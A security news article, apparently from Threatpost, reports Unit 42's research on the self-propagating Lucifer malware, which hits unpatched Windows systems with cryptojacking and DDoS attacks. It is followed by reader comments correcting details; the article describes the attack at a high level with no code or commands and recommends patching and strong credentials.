Self-Propagating Lucifer Malware Targets Windows Systems

Lucifer malware

A new devilish malware is targeting Windows systems with cryptojacking and DDoS capabilities.

Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

The never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of  taking advantage of an “exhaustive” list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” said researchers with Palo Alto Networks’ Unit 42 team, on Wednesday in a blog post. “Applying the updates and patches to the affected software are strongly advised.”

The vulnerabilities targeted by Lucifer include Rejetto HTTP File Server (CVE-2014-6287), Oracle Weblogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), Apache Struts (CVE-2017-9791), Laravel framework  CVE-2019-9081), and Microsoft Windows (CVE-2017-0144CVE-2017-0145, and CVE-2017-8464).

After successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP DoS attack. Other commands allow the malware to drop an XMRig miner and launch cryptojacking attacks, as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).

The malware is also capable of self-propagation through various methods.

It scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42’s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.

In addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the EternalBlue, EternalRomance, and DoublePulsar exploits.

Once these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.

Lucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.

These added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.

“While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it’s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,” stressed researchers.

This article was updated on June 25 to reflect the accurate conversion of XMR to USD.

BEC and enterprise email fraud is surging, but DMARC can help – if it’s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a FREE webinar, “DMARC: 7 Common Business Email Mistakes.” This technical “best practices” session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. Click here to register for this Threatpost webinar, sponsored by Valimail.

Suggested articles


  • Delph on

    "It scans for either open TCP ports (also known as port 1433)" the first part of your statement has nothing wrong but you second part of the statement is not correct. there is a chunk of port associated to TCP not just 1433.
    • Lindsey O'Donnell on

      You are correct - thank you for pointing it out!
  • Trisha C on

    going through tweaking my computer the night before last, I've already gotten rid of three of use for by problems lol I got rid of my default admin, I got rid of anything that deals with remote access and closed my ports.... Getting hacked sucks... Especially when it's a personal attack. I had to learn how to defend myself and now I hope to help others. Thank you so much for sharing the story.
  • SixOfFive on

    "0.493527 XMR approximately $32,579" .. price per monero (XMR) is very wrong ... its currently $64.68 for 1
    • Lindsey O'Donnell on

      Thanks for pointing it out. The research and article have both been updated to reflect this.

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.